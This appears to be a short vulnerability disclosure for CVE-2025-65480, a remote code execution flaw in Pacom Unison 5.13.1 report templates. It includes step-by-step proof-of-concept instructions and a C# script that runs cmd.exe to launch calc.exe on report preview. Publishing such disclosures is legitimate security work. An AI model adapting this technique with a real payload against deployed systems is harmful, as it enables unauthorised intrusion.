Share
## https://sploitus.com/exploit?id=DD68C409-AF13-58B2-8619-947122B25E9B
# CVE-2025-65480: Remote Code Execution in Pacom Unison Client
A remote code execution (RCE) vulnerability is found in Pacom Unison (5.13.1). Authenticated users can execute arbitrary code on the host system via malicious scripts injected in Report Templates. The script condition feature would allow an attacker to hide malicious code execution in a legitimate report template.

PoC:
- Login as an authenticated user and navigate to Reports (Explorer > System Configuration > Reports)
- Create a new report template.
  - Under Report properties, select C# scripting language.
  - Under Scripts tab, fill in the following PoC:
```
private bool hasExecuted = false;

private void Report_Start(object sender, EventArgs e) {
    // Reset flag every time report starts
    hasExecuted = false;
}

private void Detail1_BeforePrint(object sender, System.ComponentModel.CancelEventArgs e) {
    if (!hasExecuted) {
        System.Diagnostics.Process.Start("cmd.exe", "/c calc.exe");
        hasExecuted = true;
    }
}
```
  - Click on Preview to execute the code.



Discovered by Derek Yeh, November 2025